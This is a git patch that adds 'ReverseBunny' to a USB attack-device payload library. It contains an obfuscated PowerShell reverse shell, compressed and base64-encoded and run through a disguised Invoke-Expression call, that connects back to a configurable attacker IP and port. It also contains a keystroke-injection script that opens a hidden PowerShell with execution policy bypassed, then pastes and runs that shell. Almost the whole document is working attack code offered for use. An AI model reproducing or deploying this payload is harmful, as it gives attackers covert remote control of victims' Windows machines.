From 80c724ad9960f1740448cddcc06414d6775a507a Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Fri, 10 Sep 2021 21:36:12 +0200
Subject: [PATCH] Uploaded ReverseBunny (#464)

Obfuscated reverse shell via powershell
---
 .../remote_access/ReverseBunny/README.md | 12 ++++++++
 .../ReverseBunny/ReverseBunny.txt | 1 +
 .../remote_access/ReverseBunny/payload.txt | 30 +++++++++++++++++++
 3 files changed, 43 insertions(+)
 create mode 100644 payloads/library/remote_access/ReverseBunny/README.md
 create mode 100644 payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
 create mode 100644 payloads/library/remote_access/ReverseBunny/payload.txt

diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md
new file mode 100644
index 00000000..7f478362
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@@ -0,0 +1,12 @@
+Title: ReverseBunny
+
+Author: 0iphor13
+
+Version: 1.0
+
+
+Getting remote access via obfuscated reverse shell.
+ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
+
+# Red.............Payload running
+# Green .............Finished
diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
new file mode 100644
index 00000000..1aa4f158
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
@@ -0,0 +1 @@
+$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( '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' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'')
\ No newline at end of file
diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
new file mode 100644
index 00000000..7f45b871
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -0,0 +1,30 @@
+# Title: ReverseBunny
+# Description: Obfuscated reverse shell, executed via powershell
+# Author: 0iphor13
+# Version: 1.0
+# Category: Execution
+# Attackmodes: HID, Storage
+
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+DUCKY_LANG de
+
+#LED RED - DON'T EJECT - PAYLOAD RUNNING
+
+LED R FAST
+
+DELAY 5000
+RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
+DELAY 2000
+
+Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))"
+DELAY 5000
+Q ENTER
+DELAY 5000
+Q CONTROL v
+DELAY 5000
+Q ENTER
+
+LED FINISH
+
+#SAVE TO EJECT
\ No newline at end of file